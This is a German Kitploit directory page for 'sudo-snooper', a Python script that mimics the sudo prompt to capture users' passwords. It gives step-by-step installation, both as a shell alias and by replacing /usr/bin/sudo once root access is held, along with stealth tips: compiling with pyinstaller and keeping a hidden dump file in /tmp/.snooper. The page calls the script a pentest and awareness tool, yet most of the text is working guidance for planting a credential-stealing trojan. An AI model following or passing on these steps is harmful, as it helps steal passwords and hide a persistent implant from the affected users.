Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/xorond/sudo-snooper
Phishing-ToolsPasswortangriffePenetrationstestsSocial Engineering
GitHubxorond/sudo-snooper

sudo-snooper

Python-Skript, das sich wie das originale sudo-Binary verhält, um Benutzer dazu zu bringen, ihre Passwörter einzugeben.

Repository anzeigen
70343vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

sudo-snooper

sudo-snooper verhält sich wie das originale sudo-Binary, um Benutzer dazu zu bringen, ihr Passwort einzugeben.

Es zeigt einen gefälschten Prompt genau wie das Original an, damit der Benutzer sein sudo-Passwort eingibt.

Dies kann bei Penetrationstests oder Sicherheitsbewertungen nützlich sein, um das Benutzerwissen zu testen.

Installationsschritte

Option 1 - Alias des sudo-Befehls (einfacher, aber etwas auffälliger)

Diese Option ist einfacher umzusetzen und portabler, aber für aufmerksame Benutzer möglicherweise auffälliger.

Bearbeiten Sie die .rc-Datei der verwendeten Shell (kann .bashrc, .zshrc usw. sein) und fügen Sie folgendes hinzu:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

Stellen Sie sicher, dass sudo-snooper.py die richtigen Berechtigungen hat.

Option 2 - Installation anstelle des echten sudo (schwieriger, aber weniger offensichtlich)

Sie benötigen Root-Zugriff für diese Installationsoption

Dies wird nur nützlich, wenn Sie bereits Root-Zugriff haben, aber aus irgendeinem Grund die Hashes aus /etc/shadow nicht knacken können. Im Grunde können Sie dem Benutzer sein Passwort abluchsen.

  • Verschieben Sie das originale sudo-Binary unter einen anderen Namen
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • Ändern Sie die Parameter in der Datei nach Ihren Wünschen

Ändern Sie diese in sudo-snooper.py:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • Installieren Sie die Python-Datei in /usr/bin/sudo (oder wo auch immer sudo vorher war)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • Geben Sie der Python-Datei die notwendigen Berechtigungen

    Hier können Sie ausgefallenere Methoden anwenden, wie eine nicht lesbare, aber ausführbare Datei für Benutzer, aber darauf gehe ich nicht ein. Schauen Sie sich einige Antworten hier dazu an.

HINWEIS: Eine etwas überzeugendere Installationsmethode ist die Kompilierung mit pyinstaller, sodass es nicht als Python-Datei erscheint, wenn file /usr/bin/sudo ausgeführt wird.

Unter Archlinux funktioniert dazu: pyinstaller --onefile sudo-snooper.py. Beachten Sie jedoch, dass Sie nach der Kompilierung die Parameter in der kompilierten Binärdatei nicht mehr ändern können.

Verwendung:

Nach der Installation kann sudo-snooper wie normales sudo aufgerufen werden.

Zum Beispiel, wenn Sie

root@kitploit:~
sudo vim /etc/resolv.conf

ausführen, wird sudo-snooper aufgerufen (vorausgesetzt, es ist korrekt installiert).

Es fragt nach dem Benutzerpasswort und führt dann den Befehl aus, indem es an das echte sudo-Binary weiterleitet, wenn das Passwort korrekt ist.

Sie können dann das Benutzerpasswort abrufen, indem Sie die Dump-Datei in den Einstellungen lesen.

TODO:

  • Behandlung, wenn der Benutzer ein falsches Passwort eingibt
Tool herunterladen